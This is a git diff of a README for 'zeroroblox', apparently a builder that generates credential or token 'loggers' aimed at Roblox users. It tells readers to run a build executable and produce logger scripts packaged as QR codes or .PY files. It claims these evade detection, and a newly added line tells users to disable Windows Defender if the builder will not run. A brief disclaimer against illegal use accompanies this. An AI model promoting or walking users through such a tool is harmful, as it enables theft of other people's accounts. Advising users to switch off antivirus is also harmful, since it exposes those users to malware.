yofriendfromschool1/zeroroblox/README.md

 ## Getting Started
-  Download the files from github (open source woohoo :-) ) run the build.exe file and let it create all necessary folders and directories hit "0" to pull up the logger creation settings use the logger files/scripts how you want! these can be configured as QR codes or .PY files.
+  Download the files from github (open source woohoo :-) ) run the build-gui.exe file and let it create all necessary folders and directories hit "0" to pull up the logger creation settings use the logger files/scripts how you want! these can be configured as QR codes or .PY files.
   WE DO NOT ENCOURAGE ANY ILLEGAL USE!

   ⚠️NOTE!
-THE EXE FILE MAY BE FLAGGED BY WINDOWS DEFENDER, BUT THE LOGGING METHODS THAT ARE GENERATED ARE FULLY UNDETECTABLE!⚠️
+THE EXE FILE MAY BE FLAGGED BY WINDOWS DEFENDER, BUT THE LOGGING METHODS THAT ARE GENERATED ARE FULLY UNDETECTABLE!
+BE SURE TO DISABLE IT IF THE BUILDER WONT RUN⚠️

 ### Dependencies